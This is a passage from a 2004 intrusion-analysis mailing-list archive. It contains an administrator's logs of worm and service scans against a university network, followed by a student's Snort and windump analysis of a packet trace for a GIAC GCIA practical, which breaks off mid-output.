Jul 10 02:25:58 24.80.86.102:1817 -> xxx.yyy.255.248:4899 SYN ******S*
Jul 10 02:25:58 24.80.86.102:1818 -> xxx.yyy.255.249:4899 SYN ******S*
Jul 10 02:25:58 24.80.86.102:1819 -> xxx.yyy.255.250:4899 SYN ******S*
Jul 10 02:25:58 24.80.86.102:1820 -> xxx.yyy.255.251:4899 SYN ******S*
Jul 10 02:25:58 24.80.86.102:1823 -> xxx.yyy.255.252:4899 SYN ******S*
Jul 10 02:25:58 24.80.86.102:1824 -> xxx.yyy.255.253:4899 SYN ******S*
Jul 10 02:25:58 24.80.86.102:1825 -> xxx.yyy.255.254:4899 SYN ******S*
44885
Jul 10 19:02:32 130.13.90.154:3465 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 10 19:02:32 130.13.90.154:3471 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 10 19:02:32 130.13.90.154:3472 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 10 19:02:31 130.13.90.154:3473 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 10 19:02:31 130.13.90.154:3474 -> xxx.yyy.1.5:4899 SYN ******S*
Jul 10 19:02:31 130.13.90.154:3475 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 10 19:02:31 130.13.90.154:3476 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 10 19:02:31 130.13.90.154:3477 -> xxx.yyy.1.8:4899 SYN ******S*
[...]
Jul 10 19:08:20 130.13.90.154:4444 -> xxx.yyy.255.246:4899 SYN ******S*
Jul 10 19:08:20 130.13.90.154:4446 -> xxx.yyy.255.247:4899 SYN ******S*
Jul 10 19:08:20 130.13.90.154:4447 -> xxx.yyy.255.248:4899 SYN ******S*
Jul 10 19:08:20 130.13.90.154:4448 -> xxx.yyy.255.249:4899 SYN ******S*
Jul 10 19:08:20 130.13.90.154:4451 -> xxx.yyy.255.250:4899 SYN ******S*
Jul 10 19:08:20 130.13.90.154:4455 -> xxx.yyy.255.251:4899 SYN ******S*
Jul 10 19:08:20 130.13.90.154:4457 -> xxx.yyy.255.252:4899 SYN ******S*
Jul 10 19:08:20 130.13.90.154:4458 -> xxx.yyy.255.253:4899 SYN ******S*
Jul 10 19:08:20 130.13.90.154:4459 -> xxx.yyy.255.254:4899 SYN ******S*
44528
Jul 10 21:08:23 61.229.226.91:3627 -> xxx.yyy.1.1:1433 SYN ******S*
Jul 10 21:08:23 61.229.226.91:3628 -> xxx.yyy.1.2:1433 SYN ******S*
Jul 10 21:08:23 61.229.226.91:3629 -> xxx.yyy.1.3:1433 SYN ******S*
Jul 10 21:08:23 61.229.226.91:3631 -> xxx.yyy.1.4:1433 SYN ******S*
Jul 10 21:08:23 61.229.226.91:3632 -> xxx.yyy.1.5:1433 SYN ******S*
Jul 10 21:08:23 61.229.226.91:3635 -> xxx.yyy.1.6:1433 SYN ******S*
Jul 10 21:08:23 61.229.226.91:3637 -> xxx.yyy.1.7:1433 SYN ******S*
Jul 10 21:08:20 61.229.226.91:3638 -> xxx.yyy.1.8:1433 SYN ******S*
[...]
Jul 10 21:53:59 61.229.226.91:4977 -> xxx.yyy.255.45:1433 SYN ******S*
Jul 10 21:53:59 61.229.226.91:4001 -> xxx.yyy.255.47:1433 SYN ******S*
Jul 10 21:54:01 61.229.226.91:3851 -> xxx.yyy.255.164:1433 SYN ******S*
Jul 10 21:54:01 61.229.226.91:4902 -> xxx.yyy.255.173:1433 SYN ******S*
Jul 10 21:54:01 61.229.226.91:4922 -> xxx.yyy.255.188:1433 SYN ******S*
Jul 10 21:54:01 61.229.226.91:4521 -> xxx.yyy.255.202:1433 SYN ******S*
Jul 10 21:54:01 61.229.226.91:4108 -> xxx.yyy.255.204:1433 SYN ******S*
Jul 10 21:54:01 61.229.226.91:4951 -> xxx.yyy.255.235:1433 SYN ******S*
Jul 10 21:54:01 61.229.226.91:3076 -> xxx.yyy.255.236:1433 SYN ******S*
40624
Jul 10 01:39:03 211.218.38.226:2919 -> xxx.yyy.1.1:4899 SYN ******S*
Jul 10 01:39:01 211.218.38.226:2922 -> xxx.yyy.1.4:4899 SYN ******S*
Jul 10 01:39:01 211.218.38.226:2924 -> xxx.yyy.1.6:4899 SYN ******S*
Jul 10 01:39:03 211.218.38.226:2920 -> xxx.yyy.1.2:4899 SYN ******S*
Jul 10 01:39:01 211.218.38.226:2925 -> xxx.yyy.1.7:4899 SYN ******S*
Jul 10 01:39:01 211.218.38.226:2926 -> xxx.yyy.1.8:4899 SYN ******S*
Jul 10 01:39:03 211.218.38.226:2921 -> xxx.yyy.1.3:4899 SYN ******S*
Jul 10 01:39:01 211.218.38.226:2931 -> xxx.yyy.1.13:4899 SYN ******S*
[...]
Jul 10 01:44:00 211.218.38.226:2532 -> xxx.yyy.170.67:4899 SYN ******S*
Jul 10 01:44:00 211.218.38.226:2533 -> xxx.yyy.170.68:4899 SYN ******S*
Jul 10 01:44:00 211.218.38.226:2526 -> xxx.yyy.170.61:4899 SYN ******S*
Jul 10 01:44:00 211.218.38.226:2530 -> xxx.yyy.170.65:4899 SYN ******S*
Jul 10 01:44:00 211.218.38.226:2537 -> xxx.yyy.170.72:4899 SYN ******S*
Jul 10 01:44:00 211.218.38.226:2531 -> xxx.yyy.170.66:4899 SYN ******S*
Jul 10 01:44:00 211.218.38.226:2534 -> xxx.yyy.170.69:4899 SYN ******S*
Jul 10 01:44:00 211.218.38.226:2535 -> xxx.yyy.170.70:4899 SYN ******S*
Jul 10 01:44:00 211.218.38.226:2536 -> xxx.yyy.170.71:4899 SYN ******S*
23268
Jul 10 23:56:30 211.50.6.65:2388 -> xxx.yyy.133.234:5554 SYN ******S*
Jul 10 23:56:31 211.50.6.65:3002 -> xxx.yyy.133.234:1023 SYN ******S*
Jul 10 23:56:33 211.50.6.65:4282 -> xxx.yyy.133.234:9898 SYN ******S*
Jul 10 23:56:30 211.50.6.65:2386 -> xxx.yyy.133.235:5554 SYN ******S*
Jul 10 23:56:31 211.50.6.65:3000 -> xxx.yyy.133.235:1023 SYN ******S*
Jul 10 23:56:33 211.50.6.65:4279 -> xxx.yyy.133.235:9898 SYN ******S*
Jul 10 23:56:30 211.50.6.65:2398 -> xxx.yyy.133.236:5554 SYN ******S*
Jul 10 23:56:31 211.50.6.65:3034 -> xxx.yyy.133.236:1023 SYN ******S*
[...]
Jul 10 23:57:11 211.50.6.65:1648 -> xxx.yyy.153.134:9898 SYN ******S*
Jul 10 23:57:11 211.50.6.65:1652 -> xxx.yyy.153.135:9898 SYN ******S*
Jul 10 23:57:11 211.50.6.65:1662 -> xxx.yyy.153.137:9898 SYN ******S*
Jul 10 23:57:11 211.50.6.65:1742 -> xxx.yyy.153.139:9898 SYN ******S*
Jul 10 23:57:11 211.50.6.65:1741 -> xxx.yyy.153.138:9898 SYN ******S*
Jul 10 23:57:11 211.50.6.65:1744 -> xxx.yyy.153.140:9898 SYN ******S*
Jul 10 23:57:11 211.50.6.65:1754 -> xxx.yyy.153.141:9898 SYN ******S*
Jul 10 23:57:12 211.50.6.65:1866 -> xxx.yyy.153.144:9898 SYN ******S*
Jul 10 23:57:12 211.50.6.65:1915 -> xxx.yyy.153.146:9898 SYN ******S*
14850
Jul 10 23:56:03 220.121.22.125:1936 -> xxx.yyy.235.113:5554 SYN ******S*
Jul 10 23:56:04 220.121.22.125:2502 -> xxx.yyy.235.113:1023 SYN ******S*
Jul 10 23:56:06 220.121.22.125:3870 -> xxx.yyy.235.113:9898 SYN ******S*
Jul 10 23:56:03 220.121.22.125:1945 -> xxx.yyy.235.121:5554 SYN ******S*
Jul 10 23:56:04 220.121.22.125:2507 -> xxx.yyy.235.121:1023 SYN ******S*
Jul 10 23:56:06 220.121.22.125:3875 -> xxx.yyy.235.121:9898 SYN ******S*
Jul 10 23:56:03 220.121.22.125:1941 -> xxx.yyy.235.118:5554 SYN ******S*
Jul 10 23:56:04 220.121.22.125:2505 -> xxx.yyy.235.118:1023 SYN ******S*
[...]
Jul 10 23:56:48 220.121.22.125:3765 -> xxx.yyy.255.72:9898 SYN ******S*
Jul 10 23:56:48 220.121.22.125:3742 -> xxx.yyy.255.49:9898 SYN ******S*
Jul 10 23:56:48 220.121.22.125:3747 -> xxx.yyy.255.54:9898 SYN ******S*
Jul 10 23:56:48 220.121.22.125:3755 -> xxx.yyy.255.62:9898 SYN ******S*
Jul 10 23:56:48 220.121.22.125:3760 -> xxx.yyy.255.67:9898 SYN ******S*
Jul 10 23:56:48 220.121.22.125:3762 -> xxx.yyy.255.69:9898 SYN ******S*
Jul 10 23:56:48 220.121.22.125:3761 -> xxx.yyy.255.68:9898 SYN ******S*
Jul 10 23:56:48 220.121.22.125:3758 -> xxx.yyy.255.65:9898 SYN ******S*
Jul 10 23:56:48 220.121.22.125:3763 -> xxx.yyy.255.70:9898 SYN ******S*
14829
Jul 10 00:55:59 61.51.159.107:1121 -> xxx.yyy.215.210:5554 SYN ******S*
Jul 10 00:56:00 61.51.159.107:1601 -> xxx.yyy.215.210:1023 SYN ******S*
Jul 10 00:56:02 61.51.159.107:2623 -> xxx.yyy.215.210:9898 SYN ******S*
Jul 10 00:55:59 61.51.159.107:1122 -> xxx.yyy.215.211:5554 SYN ******S*
Jul 10 00:56:00 61.51.159.107:1606 -> xxx.yyy.215.211:1023 SYN ******S*
Jul 10 00:56:02 61.51.159.107:2629 -> xxx.yyy.215.211:9898 SYN ******S*
Jul 10 00:55:59 61.51.159.107:1123 -> xxx.yyy.215.216:5554 SYN ******S*
Jul 10 00:56:00 61.51.159.107:1604 -> xxx.yyy.215.216:1023 SYN ******S*
[...]
Jul 10 00:56:43 61.51.159.107:2444 -> xxx.yyy.236.74:9898 SYN ******S*
Jul 10 00:56:43 61.51.159.107:2449 -> xxx.yyy.236.75:9898 SYN ******S*
Jul 10 00:56:43 61.51.159.107:2452 -> xxx.yyy.236.76:9898 SYN ******S*
Jul 10 00:56:43 61.51.159.107:2557 -> xxx.yyy.215.215:9898 SYN ******S*
Jul 10 00:56:43 61.51.159.107:2561 -> xxx.yyy.215.220:9898 SYN ******S*
Jul 10 00:56:43 61.51.159.107:2560 -> xxx.yyy.215.213:9898 SYN ******S*
Jul 10 00:56:43 61.51.159.107:2558 -> xxx.yyy.215.217:9898 SYN ******S*
Jul 10 00:56:43 61.51.159.107:2563 -> xxx.yyy.215.218:9898 SYN ******S*
Jul 10 00:56:43 61.51.159.107:2564 -> xxx.yyy.215.219:9898 SYN ******S*
12800
Jul 10 00:57:08 61.149.115.82:1796 -> xxx.yyy.154.100:5554 SYN ******S*
Jul 10 00:57:09 61.149.115.82:2282 -> xxx.yyy.154.100:1023 SYN ******S*
Jul 10 00:57:08 61.149.115.82:1807 -> xxx.yyy.154.102:5554 SYN ******S*
Jul 10 00:57:09 61.149.115.82:2291 -> xxx.yyy.154.102:1023 SYN ******S*
Jul 10 00:57:08 61.149.115.82:1813 -> xxx.yyy.154.104:5554 SYN ******S*
Jul 10 00:57:09 61.149.115.82:2297 -> xxx.yyy.154.104:1023 SYN ******S*
Jul 10 00:57:08 61.149.115.82:1810 -> xxx.yyy.154.103:5554 SYN ******S*
Jul 10 00:57:08 61.149.115.82:1852 -> xxx.yyy.154.108:5554 SYN ******S*
[...]
Jul 10 00:57:58 61.149.115.82:3340 -> xxx.yyy.174.213:9898 SYN ******S*
Jul 10 00:57:58 61.149.115.82:3338 -> xxx.yyy.174.214:9898 SYN ******S*
Jul 10 00:57:58 61.149.115.82:3344 -> xxx.yyy.174.218:9898 SYN ******S*
Jul 10 00:57:58 61.149.115.82:3349 -> xxx.yyy.174.217:9898 SYN ******S*
Jul 10 00:57:58 61.149.115.82:3375 -> xxx.yyy.174.215:9898 SYN ******S*
Jul 10 00:57:58 61.149.115.82:3395 -> xxx.yyy.174.219:9898 SYN ******S*
Jul 10 00:57:58 61.149.115.82:3396 -> xxx.yyy.174.220:9898 SYN ******S*
Jul 10 00:57:58 61.149.115.82:3398 -> xxx.yyy.174.222:9898 SYN ******S*
Jul 10 00:57:58 61.149.115.82:3404 -> xxx.yyy.174.221:9898 SYN ******S*
12501
Jul 10 00:54:42 221.203.170.67:3213 -> xxx.yyy.154.115:5554 SYN ******S*
Jul 10 00:54:43 221.203.170.67:3558 -> xxx.yyy.154.115:1023 SYN ******S*
Jul 10 00:54:45 221.203.170.67:4171 -> xxx.yyy.154.115:9898 SYN ******S*
Jul 10 00:54:42 221.203.170.67:3215 -> xxx.yyy.154.117:5554 SYN ******S*
Jul 10 00:54:43 221.203.170.67:3563 -> xxx.yyy.154.117:1023 SYN ******S*
Jul 10 00:54:45 221.203.170.67:4182 -> xxx.yyy.154.117:9898 SYN ******S*
Jul 10 00:54:42 221.203.170.67:3214 -> xxx.yyy.154.119:5554 SYN ******S*
Jul 10 00:54:43 221.203.170.67:3562 -> xxx.yyy.154.119:1023 SYN ******S*
[...]
Jul 10 00:56:07 221.203.170.67:4855 -> xxx.yyy.155.178:9898 SYN ******S*
Jul 10 00:56:07 221.203.170.67:4864 -> xxx.yyy.155.182:9898 SYN ******S*
Jul 10 00:56:07 221.203.170.67:4863 -> xxx.yyy.155.184:9898 SYN ******S*
Jul 10 00:56:07 221.203.170.67:4866 -> xxx.yyy.155.185:9898 SYN ******S*
Jul 10 00:56:07 221.203.170.67:4873 -> xxx.yyy.155.180:9898 SYN ******S*
Jul 10 00:56:07 221.203.170.67:4865 -> xxx.yyy.155.179:9898 SYN ******S*
Jul 10 00:56:07 221.203.170.67:4876 -> xxx.yyy.155.181:9898 SYN ******S*
Jul 10 00:56:08 221.203.170.67:4887 -> xxx.yyy.155.183:9898 SYN ******S*
12437
Jul 10 00:53:37 218.244.206.132:4899 -> xxx.yyy.194.135:1023 SYN ******S*
Jul 10 00:53:40 218.244.206.132:3174 -> xxx.yyy.194.135:9898 SYN ******S*
Jul 10 00:53:37 218.244.206.132:4878 -> xxx.yyy.194.125:1023 SYN ******S*
Jul 10 00:53:40 218.244.206.132:3171 -> xxx.yyy.194.125:9898 SYN ******S*
Jul 10 00:53:37 218.244.206.132:4880 -> xxx.yyy.194.134:1023 SYN ******S*
Jul 10 00:53:40 218.244.206.132:3172 -> xxx.yyy.194.134:9898 SYN ******S*
Jul 10 00:53:37 218.244.206.132:4876 -> xxx.yyy.194.124:1023 SYN ******S*
Jul 10 00:53:40 218.244.206.132:3169 -> xxx.yyy.194.124:9898 SYN ******S*
[...]
Jul 10 00:55:29 218.244.206.132:3802 -> xxx.yyy.214.238:9898 SYN ******S*
Jul 10 00:55:29 218.244.206.132:3804 -> xxx.yyy.214.240:9898 SYN ******S*
Jul 10 00:55:29 218.244.206.132:3803 -> xxx.yyy.214.239:9898 SYN ******S*
Jul 10 00:55:29 218.244.206.132:3805 -> xxx.yyy.214.241:9898 SYN ******S*
Jul 10 00:55:29 218.244.206.132:3862 -> xxx.yyy.214.242:9898 SYN ******S*
Jul 10 00:55:29 218.244.206.132:3878 -> xxx.yyy.214.245:9898 SYN ******S*
Jul 10 00:55:29 218.244.206.132:3866 -> xxx.yyy.214.243:9898 SYN ******S*
Jul 10 00:55:29 218.244.206.132:3891 -> xxx.yyy.214.246:9898 SYN ******S*
Jul 10 00:55:29 218.244.206.132:3868 -> xxx.yyy.214.244:9898 SYN ******S*
10115
Jul 10 00:56:04 218.24.91.32:3104 -> xxx.yyy.174.3:5554 SYN ******S*
Jul 10 00:56:05 218.24.91.32:4577 -> xxx.yyy.174.3:1023 SYN ******S*
Jul 10 00:56:07 218.24.91.32:3072 -> xxx.yyy.174.3:9898 SYN ******S*
Jul 10 00:56:04 218.24.91.32:3107 -> xxx.yyy.174.4:5554 SYN ******S*
Jul 10 00:56:05 218.24.91.32:4582 -> xxx.yyy.174.4:1023 SYN ******S*
Jul 10 00:56:04 218.24.91.32:3103 -> xxx.yyy.174.2:5554 SYN ******S*
Jul 10 00:56:05 218.24.91.32:4575 -> xxx.yyy.174.2:1023 SYN ******S*
Jul 10 00:56:07 218.24.91.32:3068 -> xxx.yyy.174.2:9898 SYN ******S*
[...]
Jul 10 00:56:48 218.24.91.32:1403 -> xxx.yyy.194.88:9898 SYN ******S*
Jul 10 00:56:48 218.24.91.32:1408 -> xxx.yyy.194.90:9898 SYN ******S*
Jul 10 00:56:48 218.24.91.32:1610 -> xxx.yyy.194.107:9898 SYN ******S*
Jul 10 00:56:48 218.24.91.32:1625 -> xxx.yyy.194.108:9898 SYN ******S*
Jul 10 00:56:48 218.24.91.32:1641 -> xxx.yyy.194.110:9898 SYN ******S*
Jul 10 00:56:48 218.24.91.32:1639 -> xxx.yyy.194.114:9898 SYN ******S*
Jul 10 00:56:48 218.24.91.32:1666 -> xxx.yyy.194.112:9898 SYN ******S*
Jul 10 00:56:48 218.24.91.32:1686 -> xxx.yyy.194.109:9898 SYN ******S*
10005
Jul 10 00:52:22 221.192.248.109:1249 -> xxx.yyy.153.137:1023 SYN ******S*
Jul 10 00:52:25 221.192.248.109:1973 -> xxx.yyy.153.137:9898 SYN ******S*
Jul 10 00:52:22 221.192.248.109:1251 -> xxx.yyy.153.140:1023 SYN ******S*
Jul 10 00:52:25 221.192.248.109:1975 -> xxx.yyy.153.140:9898 SYN ******S*
Jul 10 00:52:22 221.192.248.109:1253 -> xxx.yyy.153.145:1023 SYN ******S*
Jul 10 00:52:25 221.192.248.109:1983 -> xxx.yyy.153.145:9898 SYN ******S*
Jul 10 00:52:22 221.192.248.109:1250 -> xxx.yyy.153.139:1023 SYN ******S*
Jul 10 00:52:25 221.192.248.109:1974 -> xxx.yyy.153.139:9898 SYN ******S*
[...]
Jul 10 00:53:53 221.192.248.109:2642 -> xxx.yyy.154.19:9898 SYN ******S*
Jul 10 00:53:53 221.192.248.109:2672 -> xxx.yyy.154.2:9898 SYN ******S*
Jul 10 00:53:53 221.192.248.109:2703 -> xxx.yyy.154.16:9898 SYN ******S*
Jul 10 00:53:53 221.192.248.109:2753 -> xxx.yyy.154.11:9898 SYN ******S*
Jul 10 00:53:54 221.192.248.109:2819 -> xxx.yyy.154.13:9898 SYN ******S*
Jul 10 00:53:54 221.192.248.109:2818 -> xxx.yyy.154.10:9898 SYN ******S*
Jul 10 00:53:54 221.192.248.109:2827 -> xxx.yyy.154.17:9898 SYN ******S*
Jul 10 00:53:54 221.192.248.109:2828 -> xxx.yyy.154.20:9898 SYN ******S*
Jul 10 00:53:54 221.192.248.109:2839 -> xxx.yyy.154.5:9898 SYN ******S*
9954
Jul 10 00:56:18 221.200.27.28:3352 -> xxx.yyy.71.161:5554 SYN ******S*
Jul 10 00:56:21 221.200.27.28:1382 -> xxx.yyy.71.161:9898 SYN ******S*
Jul 10 00:56:18 221.200.27.28:3350 -> xxx.yyy.71.160:5554 SYN ******S*
Jul 10 00:56:21 221.200.27.28:1381 -> xxx.yyy.71.160:9898 SYN ******S*
Jul 10 00:56:18 221.200.27.28:3353 -> xxx.yyy.71.162:5554 SYN ******S*
Jul 10 00:56:21 221.200.27.28:1386 -> xxx.yyy.71.162:9898 SYN ******S*
Jul 10 00:56:18 221.200.27.28:3354 -> xxx.yyy.71.163:5554 SYN ******S*
Jul 10 00:56:21 221.200.27.28:1387 -> xxx.yyy.71.163:9898 SYN ******S*
[...]
Jul 10 00:57:00 221.200.27.28:4802 -> xxx.yyy.91.175:9898 SYN ******S*
Jul 10 00:57:00 221.200.27.28:4901 -> xxx.yyy.91.232:9898 SYN ******S*
Jul 10 00:57:00 221.200.27.28:4809 -> xxx.yyy.91.184:9898 SYN ******S*
Jul 10 00:57:00 221.200.27.28:4810 -> xxx.yyy.91.185:9898 SYN ******S*
Jul 10 00:57:00 221.200.27.28:4811 -> xxx.yyy.91.186:9898 SYN ******S*
Jul 10 00:57:00 221.200.27.28:1054 -> xxx.yyy.91.234:9898 SYN ******S*
Jul 10 00:57:00 221.200.27.28:1060 -> xxx.yyy.91.236:9898 SYN ******S*
Jul 10 00:57:00 221.200.27.28:1065 -> xxx.yyy.91.240:9898 SYN ******S*
9671
Jul 10 13:17:11 213.226.134.102:2468 -> xxx.yyy.1.95:1433 SYN ******S*
Jul 10 13:17:11 213.226.134.102:2469 -> xxx.yyy.1.96:1433 SYN ******S*
Jul 10 13:17:14 213.226.134.102:2480 -> xxx.yyy.1.107:1433 SYN ******S*
Jul 10 13:17:14 213.226.134.102:2481 -> xxx.yyy.1.108:1433 SYN ******S*
Jul 10 13:17:14 213.226.134.102:2482 -> xxx.yyy.1.109:1433 SYN ******S*
Jul 10 13:17:14 213.226.134.102:2483 -> xxx.yyy.1.110:1433 SYN ******S*
Jul 10 13:17:14 213.226.134.102:2484 -> xxx.yyy.1.111:1433 SYN ******S*
Jul 10 13:17:14 213.226.134.102:2485 -> xxx.yyy.1.112:1433 SYN ******S*
[...]
Jul 10 13:28:51 213.226.134.102:4738 -> xxx.yyy.255.166:1433 SYN ******S*
Jul 10 13:28:51 213.226.134.102:4739 -> xxx.yyy.255.167:1433 SYN ******S*
Jul 10 13:28:51 213.226.134.102:4741 -> xxx.yyy.255.169:1433 SYN ******S*
Jul 10 13:28:51 213.226.134.102:4745 -> xxx.yyy.255.173:1433 SYN ******S*
Jul 10 13:28:51 213.226.134.102:4752 -> xxx.yyy.255.180:1433 SYN ******S*
Jul 10 13:28:51 213.226.134.102:4750 -> xxx.yyy.255.178:1433 SYN ******S*
Jul 10 13:28:51 213.226.134.102:4797 -> xxx.yyy.255.185:1433 SYN ******S*
Jul 10 13:28:51 213.226.134.102:1045 -> xxx.yyy.255.219:1433 SYN ******S*
Jul 10 13:28:52 213.226.134.102:1080 -> xxx.yyy.255.254:1433 SYN ******S*
9473

-- 
- Ken
===========================================================================
Ken Connelly (KC152)
Systems and Operations Manager, ITS - Network Services
University of Northern Iowa
Cedar Falls, IA 50614-0121
email: Ken.Connelly at uni.edu
phone: (319) 273-5850
fax: (319) 273-7373

From dana at dunrobin.dyn.dhs.org Sun Jul 11 13:50:34 2004
From: dana at dunrobin.dyn.dhs.org (Dana Webber)
Date: Sun, 11 Jul 2004 09:50:34 -0400
Subject: [Intrusions] LOGS: GIAC GCIA Version 3.4 Practical Detect Vilaiporn Taweelappontong
In-Reply-To: <20040711023050.52515.qmail@web51807.mail.yahoo.com>
References: <20040711023050.52515.qmail@web51807.mail.yahoo.com>
Message-ID: <200407110950.35031.dana@dunrobin.dyn.dhs.org>

Correlations?

> It is obvious that host 192.168.17.68 is a web server and it's IIS.

This is not obvious to me.

On Saturday 10 July 2004 22:30, Vilaiporn Taweelappontong wrote:
> Dear all
>
> This is a second attempt to post the assignment. I would really appreciate it if someone could give me comments on my analysis.
>
> Thank you very much in advance and regards,
> Vilaiporn
>
>
> 1. Source of trace
> Source of trace was file 2003.12.15.6 downloaded from www.incidents.org/log.
>
> -Statistics (from Ethereal)
> File length: 3000044
> Format: libpcap
> Start time: 2:07:16.936242
> End time: 2:08:17.518422
> Elapsed time between first and last packet: 60.582 seconds
> Packet count: 36672
> Snapshot length: 96
>
>
> I used the Statistics function of Ethereal to summarize a list of IP addresses and MAC addresses in the file. And I looked up the vendor of each Ethernet MAC address on the web site http://www.coffer.com/mac_find/. Below is an architecture based on my understanding:
>
>
> 10.10.10.165 (00:03:47:8c:89:c2 Intel machine ) ---> 3COM (00:01:02:79:91:ed) ---> Sniffer ----> Firewall ---> 192.168.17.68 (00:50:56:40:00:6D VMWARE)
>
> Observation:
> The file date and the timestamps reported are different. The file name indicates that the data should be from 2003/12/15, but the date specified in all packets actually indicates packets generated on 2003/11/19. I understand that some technique was used to obfuscate the information, such as modifying IP addresses, as the checksums of all packets are correct. Or no obfuscation has been done.
>
> 2. Detect was generated by
> The file is stored in tcpdump binary format. The detect presented in this assignment was generated by Snort version 2.1.1, which I ran on my Windows 2000 Server machine. I ran snort in NIDS mode with the standard snort ruleset downloaded on 2 May 2004. All rules files were enabled.
> Command that was used:
>
> C:\snort\bin\snort -r 2003.12.5.6 -c c:\snort\etc\snort.conf -l ex1 -X -d -A full
>
> -r 2003.12.5.6              read source file 2003.12.5.6
> -c c:\snort\etc\snort.conf  run against the configuration file snort.conf
> -l ex1                      log the output file (alert file and log file) in ex1 folder
> -X                          dump the raw packet data starting at the link layer (in this case, this is the Ethernet header)
> -d                          dump the application layer (dump the packet payloads with the packet headers)
> -A full                     display text alert with full packet headers
>
> The selected alert result is as follows:
>
> [**] (http_inspect) BARE BYTE UNICODE ENCODING [**]
> 11/19-02:08:04.823979 10.10.10.165:1085 -> 192.168.17.68:80
> TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF
> ***A**** Seq: 0xE4F18713  Ack: 0x16A6B6DB  Win: 0x4470  TcpLen: 20
>
> The snort rule that triggered "Bare Byte Unicode Encoding" was the http_inspect entry in the preprocessor configuration. [1] Preprocessors take the decoded packets from the Snort packet decoder and can examine or manipulate them before they are handed to the detection engine.
>
> preprocessor stream4_reassemble
>
> preprocessor http_inspect: global \
>     iis_unicode_map unicode.map 1252
>
> preprocessor http_inspect_server: server default \
>     profile all ports { 80 8080 8180 } \
>     oversize_dir_length 500
>
> Note that profile all includes "bare byte decoding" enabled. The following configuration was displayed when you run snort (without the quiet option enabled). You can see that the bare byte option was set to YES.
> > HttpInspect Config: > GLOBAL CONFIG > Max Pipeline Requests: 0 > Inspection Type: STATELESS > Detect Proxy Usage: NO > IIS Unicode Map Filename: > c:\snort\etc\unicode.map > IIS Unicode Map Codepage: 1252 > DEFAULT SERVER CONFIG: > Ports: 80 8080 8180 > Flow Depth: 300 > Max Chunk Length: 500000 > Inspect Pipeline Requests: YES > URI Discovery Strict Mode: NO > Allow Proxy Usage: NO > Disable Alerting: YES > Oversize Dir Length: 500 > Only inspect URI: NO > Ascii: YES alert: NO > Double Decoding: YES alert: YES > %U Encoding: YES alert: YES > Bare Byte: YES alert: YES > Base36: OFF > UTF 8: OFF > IIS Unicode: YES alert: YES > Multiple Slash: YES alert: NO > IIS Backslash: YES alert: NO > Directory: YES alert: NO > Apache WhiteSpace: YES alert: YES > IIS Delimiter: YES alert: YES > IIS Unicode Map: GLOBAL IIS UNICODE MAP CONFIG > Non-RFC Compliant Characters: NONE > > > > To look into the packet in details, I used windump to > generate packet in hex format: > > C:\windump>windump -r 2003.12.15.6 -x -vv -n "dst host > 192.168.17.68 and port 80" > > 02:08:04.823979 IP (tos 0x0, ttl 128, id 42592, len > 41) 10.10.10.165.1085 > 192. > 168.17.68.80: . [tcp sum ok] 3841034003:3841034004(1) > ack 380024539 win 17520 (DF) > 4500 0029 a660 4000 8006 6dd3 > 0a0a 0aa5 > c0a8 1144 043d 0050 e4f1 8713 > 16a6 b6db > 5010 4470 b6b3 0000 9000 0000 > 0000 > > > It?s obvious that host 192.168.17.68 is a web server > and it?s IIS. The data field displayed in hex above is > ?90? (NOP bytes usually used by shellcode) which seems > like someone is trying a buffer overflow on the web > server. > > Let?s also look at other packets associated with host > 192.168.17.68 for a better analysis. 
> > C:\Snort\log\old>snort -r 2003.12.15.6 -v -q "host > 192.168.17.68" > 11/19-02:07:48.841453 10.10.10.165:1691 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:41554 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:07:51.828714 10.10.10.165:1691 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:41720 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:07:57.968183 10.10.10.165:1691 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42089 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x293AB444 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:07:59.094302 10.10.10.165:1703 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42248 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:02.163499 10.10.10.165:1703 -> > 192.168.17.68:1080 > TCP TTL:128 TOS:0x0 ID:42416 IpLen:20 DgmLen:48 DF > ******S* Seq: 0x296B9F43 Ack: 0x0 Win: 0x4000 > TcpLen: 28 > TCP Options (4) => MSS: 1460 NOP NOP SackOK > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:04.823979 10.10.10.165:1085 -> > 192.168.17.68:80 > TCP TTL:128 TOS:0x0 ID:42592 IpLen:20 DgmLen:41 DF > ***A**** Seq: 0xE4F18713 Ack: 0x16A6B6DB Win: 0x4470 > TcpLen: 20 > =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ > > 11/19-02:08:08.302980 